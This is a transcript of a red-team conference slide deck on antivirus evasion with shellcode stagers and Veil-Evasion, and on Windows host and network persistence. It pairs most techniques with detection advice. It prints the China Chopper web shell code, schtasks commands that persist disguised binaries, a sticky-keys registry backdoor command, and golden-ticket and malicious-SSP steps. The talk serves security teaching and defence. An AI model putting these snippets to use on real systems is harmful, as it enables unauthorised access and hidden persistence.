the supporting role of antivirus evasion while persisting
TRANSCRIPT
The Supporting Role of Antivirus while Persisting
@ChrisTruncer
Christopher Truncer
Previous Systems Administrator turned Red Teamer
Red Team Lead at Mandiant
Florida State Seminole
Open Source Developer
@ChrisTruncer
What’s this talk about?
◉ How Stagers Work◉ Case Study: Bypassing a Signature◉ The Right Way to do Detection◉ Persistence - lots of it! :)◉ Old School and New School Techniques◉ Persistence Detection◉ Questions
Antivirus Evasion
Antivirus Evasion
◉ Whites hats and attackers need to evade antivirus
◉ Evading to establish immediate C&C of compromised system
◉ Also used to maintain access on a system/in a network
Antivirus Evasion
◉ If required to use an executable, we’ll use a stager
◉ Stager - Veil-Evasion or MSFVenom output◉ Inject shellcode into memory◉ Shellcode will download and inject a reflective dll◉ A “loader” for your real malware
Stagers
◉ Stagers can be developed in any language that can interact with the Windows functions
◉ It’s not hard to write a stager○ Just four function calls
Stagers
◉ Allocate memory to store shellcode, and set the proper memory permissions
◉ Copy shellcode into the allocated memory◉ Create a thread to execute the shellcode◉ Have code wait until thread is done executing
Stagers
◉ VirtualAlloc◉ RtlMoveMemory◉ CreateThread◉ WaitforSingleObject
AV’s Approach to Catching Malware
Methods of Detection
◉ Signature Based○ This is what Veil-Evasion targets
◉ Heuristics Based◉ Crowd Sourced
○ Reputation Based
Veil’s Approach to Bypassing AV
Approaches to Bypassing AV
◉ Ghost code / net no-operation code◉ Encrypted binaries
○ Hyperion
◉ Custom Code
Veil’s Approach
◉ Fight on-disk detection through different techniques○ Obfuscated code○ Encrypted code○ Non-standard languages for Windows binaries
■ Python, Ruby, Perl, etc.○ Shellcode-less binaries
Veil’s Approach
◉ Languages within Veil-Evasion○ Python○ Perl○ PowerShell○ C#○ C○ Go○ Ruby
Veil’s Approach
◉ Using a language that’s not C or C# made a large difference○ AV programs didn’t know or couldn’t properly inspect
non-standard languages
◉ Example:○ C vs. Python
Simply changing the language the code is written in
completely bypassed all signatures.
Veil Module
Veil Module
◉ Add a little complexity, so it isn’t just easily obvious what is happening
◉ What about encrypting the code?◉ What about making the tool brute-force its own
key?
Stallion
◉ Generate a random encryption key, that is artificially constrained○ JDUdmdkdueoLKJMsdfjkn#$%d + 1234567
◉ Test for a known string with decryption key○ If it doesn’t match, it’s the wrong key○ If it matches, decrypt the shellcode and inject it into memory
Signature Bypass
Signature Bypass
◉ After approximately one year, Veil had its first AV signature
Signature Bypass
◉ I was excited to see if someone finally figured Veil-Evasion out○ It is open source…
◉ Previous attempts have turned out fairly humorous
Persistence
Hosts vs. Networks
Persistence Purposes
◉ Persistence is commonly used to for one of two purposes:○ Persisting on a host○ Persisting a network
◉ A lot of the techniques I will cover can facilitate access for both purposes
Persisting Hosts
◉ When persisting a host, an attacker is looking for ad-hoc, or programmatically defined access, to a system○ Attacker want this as close to on-demand as possible
◉ The efforts undertaken by an attacker are directed to maintaining access to a specific host
Persisting Hosts
◉ What’s needed for persisting hosts?○ Survive Reboots
■ Probably the most important concept○ Have administrative rights on the system○ Compliment network based persistence
Persisting Networks
◉ Network based persistence in two contexts○ Used to maintain access into a network
■ Similar to host-based persistence, but its purpose isn’t for access to host, but the network
○ Used to maintain access into different networks■ Don’t want to be VLANed off in in a VOIP network
Persisting Networks (continued)
◉ What’s other network based persistence options?○ Attackers can use persistence not only to maintain access to
a network, but also obtaining their required domain permissions on-demand
○ Access likely facilitated through a host-based persistence technique
Persisting Networks
Web Shells
◉ Funny, this seems trivial and too easy that no one would ever use this…
◉ ...that’s not the case○ China Chopper - APT17, APT19, APT22○ ITSecShell, reDuh, ASPShell○ Even commodity code
China Chopper
◉ Very tiny webshell, about 4kb stored server side◉ Developed in a variety of languages
○ CFM○ ASP○ PHP○ Etc.
◉ A client application is used to interact with the webshell
China Chopper Server Code
◉ ASP○ <%@ Page
Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>
◉ PHP○ <?php @eval($_POST['password']);?>
https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html
China Chopper
◉ Really useful features in China Chopper○ File Explorer○ Upload/Download files○ Mod file timestamp attributes○ Database client - MSSQL, MySQL○ Command shell
Web Shell Prevention & Detection
◉ Hunt/Sweep for known bad files○ Hashes, or other file based indicators
◉ Blacklist all filetypes except expected files for upload functionality
◉ Don’t allow your web server to execute files uploaded from untrusted sources
Magic Packet
◉ Or “how to access port 12345 with a packet to port 443”
◉ The attacker’s problem:○ Compromised a web server (port 80 and 443 are in use)○ Firewall(s) prevent connection to any other port○ Wants a TCP backdoor to be remotely accessible
■ Can’t be bothered to write a webshell
Magic Packet
◉ Run backdoor listening on port 12345◉ Run malware “low” in the network stack
○ Check incoming TCP SYN packets○ When a SYN packet is received with a specific signature,
change destination port from 443 to 12345○ Windows network stack then delivers the pack to port 12345○ Malware alters the port in all subsequent packets for the
stream
Syn, dport: 443data=s3cr37
Mal
war
eSyn, dport: 12345
SynAcksport: 12345
SynAcksport: 443
1234
5
Compromised System
443
Magic Packet - Defenses
◉ This malware was installed via a custom compiled executable○ Application Whitelisting○ Device Guard
Outlook
◉ Outlook rules can help provide a very unique on-demand foothold onto a host
◉ Silent Break wrote a post on leveraging Outlook rules to gain access to a user’s system
◉ Provides access immediately when Outlook triggers the rule
Outlook
◉ Attacker creates an Outlook rule to execute a binary when the “trigger” subject is received
◉ Attacker will sync the rule against the target user’s account
◉ Send an e-mail with the trigger in the subject◉ Get shell :)
Outlook - Additional Tweaks
◉ Have another rule auto-delete the incoming e-mail to prevent user detection of the trigger○ https://silentbreaksecurity.com/malicious-outlook-rules/
Outlook - Detection
◉ Honestly, not certain on the best means to detect this at scale
◉ Primary IOC is to execute a program when receiving an e-mail○ I don’t know if any legit use cases for this
Persisting Hosts
Registry Hacks
◉ This is the 101 method for persistence that almost everyone learns
◉ Extremely easy to set up, and can be installed with a range of permissions
Registry Hacks
◉ These can be configured to run when the system starts, or a user logs into the system○ HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\R
un○ HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\R
un
◉ These methods are highly publicized and well known.
◉ Defensive tools look for these
Registry Hacks - Takeaway
◉ These can be good for maintaining initial access, but not for long term use
◉ SOCs - you want to have the ability to detect these
Startup Folder
◉ Your system will execute files in the startup folder○ C:\ProgramData\Microsoft\Windows\Start
Menu\Programs\Startup
Scheduled Tasks
◉ Scheduled tasks are an easy way for a user of any level to persist on a system
◉ With the proper permissions, you can schedule a task up to the SYSTEM level
◉ This is Microsoft’s recommendation/alternative to using “at” jobs
Scheduled Tasks
◉ Scheduled tasks can be created from the command line with schtasks.exe or the GUI
◉ Tasks can run at startup, when a user logs into the system, after the system has been idle, etc.
◉ Tasks can run binaries, PowerShell one-liners, and more
Scheduled Tasks
◉ schtasks /create /tn SysUpdate /sc onidle /i 15 /tr c:\users\chris\downloads\safe.exe
◉ schtasks /create /tn WinUpdate /sc onstart /ru System /tr c:\totallylegit.exe /s winsqldbsystem
Scheduled Tasks - Detection
◉ Obtain a baseline of the scheduled tasks set to run on your systems○ Schtasks /query○ Task scheduler○ Etc.
◉ Audit systems and identify deviations from your baseline
Service Manipulation
◉ Services usually run with SYSTEM level permissions, so can be juicy targets for attackers
◉ Easy way to install service based persistence? Check service binary write permissions!
Service Manipulation
◉ Now that you found services that can be modified, you just need a service binary.○ Veil-Evasion, PowerUp, custom code
◉ Save the original service binary◉ Bounce the box (or service) if required
Sticky Keys
◉ With administrative access to a machine, you can easily setup sticky keys○ Copy sethc.exe○ Copy cmd.exe to C:\Windows\System32\sethc.exe○ Reboot, and hit shift five times
Sticky Keys - Another Method
◉ Set cmd.exe as the debugger for sethc.exe◉ REG ADD
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /t REG_SZ /d "C:\windows\system32\cmd.exe"
Sticky Keys - Another Method
◉ Main problem - doesn’t require authentication◉ If using Sticky Keys, ensure it’s calling back to a
location you control, vs. opening up the system for everyone
Sticky Keys - Detection
◉ Compare known good sethc.exe binary hash with systems’ current sethc.exe binary
◉ Ensure no registry key is added defining a debugger for sethc.exe
New School Persistence Techniques
DLL Search Order Hijack
◉ DLL search order hijacking exploits how windows searches for DLLs when loading an executable
◉ Specifically, it exploits the fact that Windows will always search the currently folder of the executable for a dll
DLL Search Order Hijack
◉ Sample in CAPEC○ If you drop ntshrui.dll within C:\Windows and run
explorer.exe, you can get the dll within C:\Windows to be executed
◉ This exploits the order in which the dll is searched for on a Windows system
DLL Search Order Hijack
◉ Attackers create malicious DLLs that exploit this search order to get their DLL to run on a system
◉ Since it’s every time the application runs, it can be used as a persistence technique
◉ PowerUp can be used to find these opportunities
DLL Search Order Hijack
◉ Used by the following actors:○ APT 1, APT 8, APT 17, APT 19, APT 22, APT 26
◉ Used by the following malware:○ AMISHARP, GH0ST, HOMEUNIX, POISON IVY, VIPER
Legitimate Scheduled Tasks
◉ Easy to identify scheduled tasks named “Evil task”
◉ First we must look at how investigators detect malicious scheduled tasks
Legitimate Scheduled Tasks
◉ Stacking tasks across multiple systems to determine anomalous tasks
◉ Parse task scheduler log (schedLgu.txt)
Legitimate Scheduled Tasks
◉ What if we modify existing legit scheduled tasks?○ Specifically tasks that are
not required for Windows functionality
Unquoted Service Paths
◉ Unquoted service paths exploit a vulnerability in the order that Windows searches for a binary when a space is in an unquoted path○ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe
Unquoted Service Paths
◉ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe○ C:\Program.exe○ C:\Program Files(x86)\Steam\Steam.exe○ C:\Program Files(x86)\Steam\Steam Gaming\steam.exe
◉ Three opportunities
Unquoted Service Paths
◉ If we have write access to any of the paths that Windows looks for, we can hijack the service○ Just need a service binary
◉ Drop it into any of the paths on the previous slide, and restart the service○ Might need to wait for a reboot
Unquoted Service Paths - Prevention
◉ Check service binaries on your images and determine if any are using unquoted service paths.
◉ Make sure the paths aren’t writable to non-admins.
◉ PowerUp can find these as well
WMI Requirements
◉ Event Filter◉ Event Consumer◉ Filter/Consumer Binding
WMI Requirements - Event Filter
◉ The WMI query that fires upon an event occurring○ Usually, an event class derived from
__InstanceModificationEvent, __InstanceCreationEvent, or __InstanceDeletionEvent
WMI Requirements - Event Consumer
◉ There are five different event consumers○ The most interesting one is “CommandLineEventConsumer”
◉ These “consume” or act on events that occur
WMI Requirements - Filter/Consumer Binding
◉ This associates a WMI Event Filter with the Event Consumer
WMI - Persistence
◉ PowerSploit’s persistence module for WMI○ Automates the creation process○ Will create a permanent WMI event subscription
PowerShell Profiles
◉ Anytime PowerShell runs, it will execute code in the default profile
◉ Create profile code here:○ C:\Windows\System32\WindowsPowerShell\v1.0\profile.p
s1
PowerShell Profiles
◉ Use standard persistence mechanism to execute PowerShell silently○ "C:\Windows\System32\WindowsPowerShell\v1.0\powers
hell.exe" -NonInteractive -WindowStyle Hidden○ It’s a legit exe!
PowerShell Profiles
◉ Example in profile.ps1:○ iex("write-host 'hello world'")
Security Support Provider
◉ A Security Support Provider (SSP) - a security package○ An extension used to perform authentication during
client/server exchange
◉ An Authentication Package (AP)○ Extends interactive login authentication○ Example: RSA tokens
Security Support Provider
◉ SSP/AP○ Can serve tasks of SSPs and APs - loaded into lsass at boot○ Example: Kerberos and msv1_0 (NTLM)
Security Support Provider
◉ Install your own SSP that is loaded into lsass.exe◉ Can develop your own SSP DLL◉ Use Persistence module in PowerSploit to install
your malicious SSP
Security Support Provider
◉ Ben Delpy (@gentilkiwi) added SSP functionality into mimilib.dll○ Once installed and loaded into lsass.exe, it captures
plaintext passwords
Excel Magic
◉ Malicious macro executes backdoor◉ How can you ensure persistence?
○ Most users will run Excel once a day○ You can use any “old school” techniques to spawn Excel○ Disable macro settings to run macro without user prompt
Excel Magic
◉ Registry modification that opens specific Workbook upon starting Excel○ HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Ex
cel\Security\Trusted Locations○ Just add the location
Additional Persistence Opportunities
Golden Tickets
◉ Method was developed with Ben Delpy and Sean Metcalf
◉ Forges a “golden” kerberos ticket which can be good for 10 years!
◉ Golden tickets provide on-demand domain privilege “upgrades” for any group within the domain
Golden Tickets
◉ Only need four pieces of information○ Domain SID○ Name of the domain○ User you want to create a ticket for○ Krbtgt account hash
◉ You can build your ticket at home, offline
Golden Ticket Takeaways
◉ If impersonating an account, tickets are still valid even if password changes
◉ Valid for as long as you specify (10 year default)◉ Domain trusts
○ Child domains can compromise the parent
◉ Only way to stop is change krbtgt hash… twice…◉ Or rebuild from bare metal
Account Checkout - Case Study
◉ Client had account checkout system for domain administrator accounts
◉ Only two users with access to checkout system◉ System requires 2FA◉ DA access is lost if user changes their
password/pin/token◉ Users can see checked out accounts
Account Checkout - Case Study
◉ Persist domain administrator without getting caught○ Can’t continuously check out accounts
◉ Password vault permissions were managed through Active Directory groups○ Tons of them
Account Checkout - Case Study
◉ Copy group memberships to a compromised user account○ User doesn’t use the Password Vault
■ All changes were documented
◉ This gave us all the permissions we needed without needing access to their Password Vault
Account Checkout - Case Study
◉ Copy group memberships to a compromised user account○ User doesn’t use the Password Vault
■ All changes were documented
◉ This gave us all the permissions we needed without needing access to their Password Vault
Conclusions
Conclusions
◉ Persistence will remain rampant◉ Always new and creative ways to maintain
persistence◉ Understanding persistence techniques is critical
to detecting attacker access